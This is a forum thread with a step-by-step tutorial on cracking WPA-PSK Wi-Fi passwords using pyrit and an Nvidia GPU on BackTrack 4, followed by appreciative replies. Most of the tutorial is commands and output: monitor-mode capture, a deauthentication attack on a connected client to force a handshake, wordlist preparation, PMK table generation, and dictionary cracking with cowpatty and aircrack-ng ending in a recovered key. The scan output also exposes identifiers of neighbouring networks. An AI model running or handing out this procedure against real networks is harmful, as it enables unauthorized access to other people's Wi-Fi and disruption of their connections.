pyrit CUDA nvidia Tutorial + Nvidia overclock instructions

[pureh@te]

OK so here we are with fresh new release and people lets be honest we want to see some thing new. Well this is one of bt4's new exiting features.

WPA hash Table Generation using CUDA/nvida GPU power.

First thing to do is check if your card is supported for this technology http://en.wikipedia.org/wiki/CUDA#Supported_GPUs

So lets get started....

I'm going to try to assume that if your reading this you have no clue what your doing so I will try to go from A -Z on this.

So lets boot our disk and when we get to the framebuffer console prompt (thats before you startx) we are going to install the nvidia kernel module.

Code:

root@bt:~# cd /opt/cuda/
root@bt:/opt/cuda# ls
CUDA_INSTALL  cuda-set-env.sh  nv_20090130-1_i386.deb
root@bt:/opt/cuda# bash CUDA_INSTALL

You will get some output and then you will be asked to overwrite your current xorg.conf. Take the default here which is no.
next lets install the driver

Code:

root@bt:~# modprobe nvidia
root@bt:~# depmod -a

ok so thats done. Now since we've totally borked our xorg.conf we should generate a new one.

Code:

root@bt:~# X -configure

That will save the new one in /root and we will have to copy it over by hand

Code:

root@bt:~# cp xorg.conf.new  /etc/X11/xorg.conf

At this point we should be able to either startx or use the new bt4-crystal window manager. (shameless plug for me and j0rgan here)

OK so if every thing went well your are looking at your desktop.

Now before we get to cracking pyrit has a benchmark utility we can use to see if we are good to go.

Code:

root@bt:/pentest/password/pyrit# python pyrit.py benchmark
The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3

The ESSID-blobspace seems to be empty; you should create an ESSID...
Available cores: 'Standard CPU', 'Nvidia CUDA'
Testing CPU-only core 'Standard CPU' (4 CPUs)...  1294.58 PMKs/s

Testing GPU core 'Nvidia CUDA' (Device 'GeForce 8800 GT')...  5409.43 PMKs/s

As you can see my 8800gt is roughly 5 times faster that my Q6600 quad core chip running at 3.6 GHz

OK swell, so that works. Now what we need is a .cap file. I'm assuming every one can do this but I will show it anyway.

Code:

root@bt:~# ifconfig wlan0 up
root@bt:~# airmon-ng start wlan0
root@bt:~#airodump-ng -w cudacapture mon0

ok so lets do a little scan of my house.


As you can see I have 2 dd-wrt routers on at the moment and my wife is connected to ddwrt1 feeding her new facebook addiction.
Lets deauth her a$$

Code:

root@bt:~# aireplay-ng -0 10 -a 00:1d:7e:f0:a5:8f -c 00:13:02:a7:dd:53 mon0
01:13:28  Waiting for beacon frame (BSSID: 00:1D:7E:F0:A5:8F) on channel 6
01:13:29  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [25|68 ACKs]
01:13:30  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [ 3|63 ACKs]
01:13:31  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
01:13:32  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
01:13:33  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|63 ACKs]
01:13:34  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
01:13:35  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
01:13:36  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [ 5|64 ACKs]
01:13:37  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [11|64 ACKs]
01:13:38  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]

Now lets check for success

Code:

root@bt:~# aircrack-ng cudacapture-01.cap
Opening cudacapture-01.cap
Read 5612 packets.

   #  BSSID              ESSID                     Encryption

   1  00:1D:7E:F0:A5:8F  ddwrt1                    WPA (1 handshake)
   2  00:1D:7E:64:9A:7C  ddwrt2                    WPA (0 handshake)
   3  00:21:29:84:11:FD  CookNet                   WEP (34 IVs)
   4  00:0C:41:3E:2D:66  linksys                   None (192.168.1.1)
   5  00:12:0E:7B:02:78  WEST7359                  No data - WEP or WPA
   6  00:1A:70:83:B0:1C  linksys                   None (0.0.0.0)
   7  00:13:46:44:A5:CE  default                   WEP (11 IVs)
   8  00:14:6C:F6:36:78  CBC                       None (0.0.0.0)
   9  00:06:25:DB:3E:7B  linksys                   None (0.0.0.0)
  10  00:1B:2F:63:7C:50  PawsWithPurpose           No data - WEP or WPA
  11  00:21:29:9A:E6:3C  Bigfoot                   No data - WEP or WPA
  12  00:1C:10:89:16:76  linksys                   None (0.0.0.0)

Index number of target network ?

Looks like we got one.
I'm going to start a new post for part 2

[pureh@te]

Okay so we got a hand shake now what?

First off we need to grab a dictionary file.

Code:

root@bt:~# wget http://www.outpost9.com/files/wordlists/dic-0294.zip
--2009-02-11 01:17:53--  http://www.outpost9.com/files/wordlists/dic-0294.zip
Resolving www.outpost9.com... 12.180.200.208
Connecting to www.outpost9.com|12.180.200.208|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3283473 (3.1M) [application/zip]
Saving to: `dic-0294.zip'

100%[=============================================================================================================>] 3,283,473    268K/s   in 9.2
root@bt:~# unzip dic-0294.zip 
Archive:  dic-0294.zip          
  inflating: dic-0294.txt

Then we need to strip out the stuff we dont need.

Code:

root@bt:~# cat dic-0294.txt | sort | uniq | pw-inspector -m 8 -M 63 > wpa.lst
root@bt:~# wc -l wpa.lst 
597532 wpa.lst

So about six hundred thousand words.

Now we got a file to work with. Now for the fun part.

Code:

root@bt:~# cd /pentest/password/pyrit/
root@bt:/pentest/password/pyrit#

Add our essid

Code:

root@bt:/pentest/password/pyrit# python pyrit.py -e ddwrt1 create_essid
The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3

Created ESSID 'ddwrt1'

Import our new wpa list

Code:

root@bt:/pentest/password/pyrit# python pyrit.py -f /root/wpa.lst import_passwords
The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3

Importing from  '/root/wpa.lst'
597532 lines read. All done.

And start the table generation

Code:

root@bt:/pentest/password/pyrit# python pyrit.py batchprocess
The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3

Using default core 'Nvidia CUDA' (Device 'GeForce 8800 GT')
Working on ESSID 'ddwrt1'
Reading unit '1ec5841a057928e33972489b461cb914' (54072 passwords buffered)  
 All done, computed 54072 PMKs in 10.47 seconds, 5164.13 PMKs/s)
Reading unit '6c9303c848ed6a4473221229d4387934' (54996 passwords buffered)  
 All done, computed 54996 PMKs in 10.79 seconds, 5099.30 PMKs/s)
Reading unit '70ded804144475dbc58b982625483821' (56076 passwords buffered)  
 All done, computed 56076 PMKs in 10.74 seconds, 5223.29 PMKs/s)...

...Reading unit 'f384ca460307a079503db313ece6806e' (53808 passwords buffered)  
 All done, computed 53808 PMKs in 10.67 seconds, 5044.67 PMKs/s)
Reading unit '1bf464713cab79da5efc8503e8f28812' (17496 passwords buffered) 
 All done, computed 17496 PMKs in 3.23 seconds, 5422.30 PMKs/s)

Batchprocessing done.

So if everything went well you are at this point. Pyrit has the ability to output to cowpatty or airolib-ng files. For the sake of this tutorial I will be using cowpatty because I've found its faster.

So lets make our cowpatty file

Code:

root@bt:/pentest/password/pyrit# python pyrit.py -e ddwrt1 -f cow.out export_cowpatty
The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3

Exporting to 'cow.out'...
4656218 entries written. All done.

Okay so lets see how fast this will go.

Code:

root@bt:~# cd /pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty/
root@bt:/pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty# ls
AUTHORS    COPYING     cowpatty.h  eap-test.dump  fpga.c  genpmk.c  Makefile  md5.o       sha1.c  TODO     utils.o
CHANGELOG  cowpatty    cowpatty.o  FAQ            fpga.o  genpmk.o  md5.c     radiotap.h  sha1.h  utils.c  wpa2psk-linksys.dump
common.h   cowpatty.c  dict        file_magic     genpmk  INSTALL   md5.h     README      sha1.o  utils.h  wpapsk-linksys.dump
root@bt:/pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty# ./cowpatty
cowpatty 4.3 - WPA-PSK dictionary attack. <jwright@hasborg.com>
cowpatty: Must supply a list of passphrases in a file with -f or a hash file
          with -d.  Use "-f -" to accept words on stdin.

Usage: cowpatty [options]

        -f      Dictionary file
        -d      Hash file (genpmk)
        -r      Packet capture file
        -s      Network SSID (enclose in quotes if SSID includes spaces)
        -F card Use FPGA acceleration
        -h      Print this help information and exit
        -v      Print verbose information (more -v for more verbosity)
        -V      Print program version and exit

root@bt:/pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty# ./cowpatty -d /pentest/password/pyrit/cow.out -s ddwrt2 -r /root/cudacapture-01.cap
cowpatty 4.3 - WPA-PSK dictionary attack. <jwright@hasborg.com>

Collected all necessary data to mount crack against WPA2/PSK passphrase.
Starting dictionary attack.  Please be patient.
key no. 1000: Mathboldit1
key no. 2000: llegando2
key no. 3000: shougakukan123
key no. 4000: DISGUISING
key no. 5000: Graffaloy
key no. 6000: Passibleness123
key no. 7000: Unmaking2
key no. 8000: Procanal123

So this is the cracking proccess.......

Code:

[4656217 passphrases tested in 24.84 seconds:  187468.86 passphrases/second
root@bt:/pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty#

And Just to show you what it would be like with out the hash file..

Code:

root@bt:/pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty# ./cowpatty -f /root/wpa.lst -s ddwrt2 -r /root/cudacapture-01.cap

27824 passphrases tested in 84.98 seconds:  327.40 passphrases/second

Thats a HUGE difference

[pureh@te]

So you would rather use rather use the airolib-ng option because you love aircrack. That can be done as well like this..

Back up to right before we created the cow.out table and use these commands instead.

create the database (pyrit wont do it for you for some reason)

Code:

[root@bt:/pentest/password/pyrit# airolib-ng testdb -import essid ddwrt1 
Database <testdb> does not already exist, creating it...
Database <testdb> sucessfully created
Could not open file/stream for reading.

Then output to our newly created database.

Code:

[root@bt:/pentest/password/pyrit# python pyrit.py -e ddwrt1 -f testdb export_hashdb
The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3

Exporting ESSID 'ddwrt1'

Okay.. this takes a little longer than the cowpatty tables due to sql stuff but the advantage to airolib-ng is it can use HUGE files while I think cowpatty fails with hash files over 2 gigs.

Once its done we can use aircrack

Code:

root@bt:/pentest/password/pyrit# aircrack-ng -r testdb /root/cudacapture-01.cap 
Opening /root/cudacapture-01.cap
Read 10561 packets.

   #  BSSID              ESSID                     Encryption

   1  00:1D:7E:F0:A5:8F  ddwrt1                    WPA (1 handshake)
   2  00:1D:7E:64:9A:7C  ddwrt2                    WPA (0 handshake)
   3  00:21:29:84:11:FD  CookNet                   WEP (93 IVs)
   4  00:0C:41:3E:2D:66  linksys                   None (192.168.1.1)
   5  00:12:0E:7B:02:78  WEST7359                  No data - WEP or WPA
   6  00:1A:70:83:B0:1C  linksys                   None (192.168.1.1)
   7  00:13:46:44:A5:CE  default                   WEP (28 IVs)
   8  00:14:6C:F6:36:78  CBC                       None (0.0.0.0)
   9  00:06:25:DB:3E:7B  linksys                   None (0.0.0.0)
  10  00:1B:2F:63:7C:50  PawsWithPurpose           No data - WEP or WPA
  11  00:21:29:9A:E6:3C  Bigfoot                   No data - WEP or WPA
  12  00:1C:10:89:16:76  linksys                   None (0.0.0.0)
  13  00:18:3A:3A:B2:B5                            No data - WEP or WPA
  14  00:12:0E:6E:FE:6B  WEST3306                  No data - WEP or WPA

Index number of target network ? 1

Select the network and let her rip

Code:

                                 Aircrack-ng 1.0 rc2 r1385


                   [00:00:38] 4315315 keys tested (112595.70 k/s)


                          KEY FOUND! [ metasploit ]


      Master Key     : F4 AB C6 2A 18 F8 89 9B 6A 70 3D 5F EB 0D F4 F9 
                       F8 F8 51 48 25 3E C3 61 EA 54 17 3D D3 84 18 AC 

      Transient Key  : 11 A0 36 8F 96 63 64 7F 63 A1 08 35 73 82 96 AE 
                       49 E1 BE 68 F7 7E 8D 98 57 28 C2 E1 DE AC F2 AC 
                       68 00 43 B9 88 8E 96 57 7A BF E2 62 DB DE 6A 1B 
                       BF 53 10 26 D1 D8 32 47 BC A6 F5 86 F1 83 23 11 

      EAPOL HMAC     : 68 AE A8 82 57 7C 3D 89 6E BC BD C1 46 8E 34 AD 


Quitting aircrack-ng...

Well Thats IT! Thanks for Listening/Reading

[=Tron=]

Beautiful! Thank you for the write up, this is one of the features that I really hoped would be incorporated into BT4.

[Barry]

Dude, that's cool. Now figure out how to use all your nvidia cards in your SuperAwesomeSuperComputer at the same time.

[adri_ht_]

Wonderful starting point for BT4 Beta!! Shame on me for not having an Nvida Card to test it out. I used to get 10,000 k/s with a pre-hashed airolib database, what you are getting is just insane.

[Barry]

Quote:

Originally Posted by adri_ht_

Wonderful starting point for BT4 Beta!! Shame on me for not having an Nvida Card to test it out. I used to get 10,000 k/s with a pre-hashed airolib database, what you are getting is just insane.

Heh, I don't even have a computer that's compatible(or new enough) with the nvidia cards that work with pyrit.....

[kidFromBigD]

Quote:

Originally Posted by pureh@te

Lets deauth her a$$

...My favorite quote from your tutorial.

Thanks for posting this. Yes, it is time to upgrade my hardware to something that takes advantage of the GPU power. I'd like to see follow-up posts from other members with GTX-200 series cards. Those numbers should be off the charts.

[mklo1]

Does this mean if my MB has a built in ATI graphic it will not work? I do have a nvidia 6600 serires card lying around, will it work?

[pureh@te]

The onboard card shouldnt matter. If you have a nvidia card in the pci slot it should get detected. Some of the newer nvidia stuff doesn't even have vga outs, its only for computuing.

Like this one I'm saving up for...

http://www.nvidia.com/object/product..._c1060_us.html


You can check for your card here

http://en.wikipedia.org/wiki/CUDA#Supported_GPUs